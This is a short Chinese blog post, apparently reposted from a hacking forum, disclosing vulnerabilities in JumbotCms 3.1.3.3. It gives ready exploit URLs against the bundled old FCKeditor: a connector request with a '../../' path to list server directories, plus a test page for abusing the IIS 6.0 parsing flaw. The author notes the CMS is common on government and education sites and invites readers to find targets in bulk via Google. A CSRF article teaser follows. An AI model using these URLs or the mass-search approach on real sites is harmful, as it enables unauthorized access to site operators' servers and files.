将博 CMS Powered by JumbotCms 漏洞

  • A+
所属分类:lcx

由于工作关系检测某站的时候发现的他的URL比较特别 有个cmsfile的目录 ;扫了下目录 发现有fck 因为版本比较低,可以遍历目录

百度了一下没有人发,就发一下吧 比较低级的漏洞 ,一些政府和教育机构用的比较多

主要是FCKeditor的漏洞 版本忘记看了。。。。

程序名称:将博CMS通用版 JumbotCms

程序版本:3.1.3.3

利用方式:

利用IIS6.0解析漏洞

http://www.xxx.com/cmsfile/fckeditor/editor/filemanager/browser/default/connectors/test.htm

遍历目录漏洞

http://www.xxx.com/cmsfile/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

将博 CMS Powered by JumbotCms 漏洞

不要拍砖,看客全当笑话

没事了自己去谷歌批量吧

Powered by JumbotCms 版本:3.1.3.3

转自:http://www.90sec.org/viewthread.php?tid=1964&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

文章来源于lcx.cc:将博 CMS Powered by JumbotCms 漏洞

相关推荐: 浅谈CSRF攻击方式,Cross-site request forgery,跨站请求伪造详解

一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么? 你这可以这么理解C…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: